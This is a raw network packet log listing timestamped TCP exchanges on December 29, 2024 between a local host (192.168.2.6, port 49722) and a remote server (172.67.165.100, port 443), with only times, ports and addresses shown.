Dec 29, 2024 04:24:23.929146051 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.929800034 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.935866117 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.935879946 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.935961008 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.935966015 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.936080933 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.059514046 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.059531927 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.059593916 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.059602022 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.059633970 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.060030937 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.094860077 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.094907045 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.094933987 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.094938040 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.094971895 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.094990969 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.096477985 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.096597910 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.099617004 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.099673986 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.103792906 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.103853941 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.103879929 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.103883982 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.103919983 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.103933096 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.105789900 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.105846882 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.109025955 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.109103918 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.109108925 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.109148979 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.114274979 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.114311934 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.114351034 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.114368916 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.114382029 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.114572048 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.117418051 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.117505074 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.119391918 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.119448900 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.124633074 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.124685049 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.124732971 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.124738932 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.124766111 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.124783993 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.127783060 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.127844095 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.128933907 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.129004955 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.133665085 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.133708954 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.133738041 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.133743048 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.133769989 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.133778095 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.138812065 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.138847113 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.138879061 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.138883114 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.138910055 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.138920069 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.139956951 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.140027046 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.259469032 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.259598017 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.259617090 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.259680033 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.264386892 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.264425993 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.264467001 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.264473915 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.264501095 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.264512062 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.298331976 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.298368931 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.298401117 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.298404932 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.298430920 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.298448086 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.303586006 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.303653002 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.303687096 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.303690910 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.303714991 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.303733110 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.307738066 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.307790995 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.307825089 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.307827950 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.307848930 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.307853937 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.307874918 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.307878971 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.307898045 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.307921886 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.310892105 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.310956001 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.313097954 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.313168049 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.314043999 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.314100027 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.316132069 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.316194057 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.318233013 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.318294048 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.319379091 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.319443941 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.323491096 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.323556900 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.323560953 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.323586941 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.323601961 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.323605061 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.323631048 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.323656082 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.328708887 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.328754902 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.328783035 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.328792095 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.328814030 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.328835964 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.333463907 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.333498955 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.333529949 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.333534002 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.333554983 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.333576918 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.338685989 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.338721037 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.338771105 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.338776112 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.338802099 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.338828087 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.343028069 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.343065977 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.343094110 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.343097925 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.343120098 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.343147993 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.464324951 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.464389086 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.464411974 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.464437962 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.464467049 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.464484930 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.496952057 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.497029066 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.497049093 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.497287989 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.498271942 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.498332024 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.502573967 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.502614975 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.502638102 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.502661943 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.502686977 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.502729893 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.509872913 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.509887934 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.509944916 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.509953022 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.509996891 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.513020992 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.513077021 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.520258904 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.520272970 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.520322084 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.520328999 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.520354033 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.520373106 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.526647091 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.526659966 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.526700974 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.526707888 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.526731014 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.526746988 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.534427881 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.534441948 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.534495115 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.534501076 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.534564018 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.540838003 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.540853024 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.540936947 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.540942907 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.540985107 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.664604902 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.664632082 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.664673090 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.664691925 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.664719105 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.664741039 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.700555086 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.700571060 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.700628996 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.700644016 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.700658083 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.700679064 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.706943035 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.706973076 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.706998110 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.707005024 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.707034111 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.707050085 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.707904100 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.707953930 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.712244987 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.712285995 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.712300062 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.712305069 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.712335110 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.712349892 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.717459917 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.717508078 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.717524052 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.717530012 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.717554092 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.717569113 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.722707987 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.722743034 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.722784996 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.722790956 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.722815990 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.722831964 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.729902029 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.729914904 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.729969978 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.729975939 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.730012894 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.736735106 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.736747026 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.736789942 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.736797094 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.736816883 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.736831903 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.737766981 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.737812996 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.743001938 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.743040085 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.743057966 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.743062973 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.743088007 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.743103027 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.743129015 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.743170023 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.863950014 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.864010096 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.864026070 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.864044905 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.864059925 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.864377975 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.869055986 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.869093895 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.869117022 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.869122028 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.869152069 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.869159937 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.899398088 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.899452925 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.901542902 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.901601076 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.903053045 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.903126001 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.907234907 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.907295942 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.907303095 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.908278942 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.908329964 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.908334970 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.911696911 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.913522005 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.913583040 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.913599014 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.913603067 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.913624048 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.913641930 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.915599108 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.915663958 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.917777061 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.917844057 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.923047066 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.923093081 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.923119068 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.923122883 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.923145056 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.923160076 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.925131083 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.925189972 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.928216934 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.928297997 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.931376934 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.931427002 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.933553934 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.933612108 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.937764883 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.937802076 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.937824011 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.937829971 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.937868118 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.939732075 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.939786911 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.943401098 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.943471909 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:24.943476915 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:24.949275017 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:25.073968887 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:25.074032068 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:25.074054003 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:25.074068069 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:25.074085951 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:25.074176073 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:25.078375101 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:25.078413010 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:25.078439951 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:25.078444958 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:25.078473091 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:25.078493118 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:25.103213072 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:25.103249073 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:25.103281021 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:25.103293896 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:25.103318930 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:25.103331089 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:25.108488083 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:25.108520985 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:25.108551979 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:25.108561039 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:25.108587980 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:25.108606100 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:25.112788916 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:25.112822056 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:25.112848043 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:25.112854958 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:25.112880945 CET	49722	443	192.168.2.6	172.67.165.100
